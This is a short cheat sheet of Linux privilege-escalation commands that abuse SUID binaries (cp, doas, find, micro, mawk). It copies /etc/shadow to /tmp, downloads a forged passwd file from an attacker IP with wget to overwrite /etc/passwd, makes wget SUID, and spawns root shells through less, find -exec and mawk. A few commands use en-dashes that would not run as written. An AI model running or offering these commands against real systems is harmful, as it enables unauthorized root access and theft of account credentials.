SUID Files

/usr/bin/cp

# cp -- Il cp is SUID, you can copy privilegied files to /tmp and read them
cp /etc/shadow /tmp

# generate new account
openssl passwd -1 -salt username password
# Then create a fake /etc/passwd file, upload it to the target and cp
wget http://192.168.1.111:8000/passwd
cp passwd /etc/passwd


/usr/bin/doas

# doas
cat /etc/doas.conf
doas /usr/bin/less /var/log/authlog
# Press v to escape vi then
:!sh


/usr/bin/find

# find
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;

# another method
find /home –exec chmod u+s /usr/bin/wget \;
ls –la /usr/bin/wget
cat /etc/passwd
# then create another etc/passwd file and upload it


/usr/bin/micro

# micro editor
cat /etc/passwd | /usr/bin/micro

# Then generate another user
openssl passwd -1 -salt user3 pass123


/usr/bin/mawk

# mawk
mawk 'BEGIN {system("/bin/sh")}'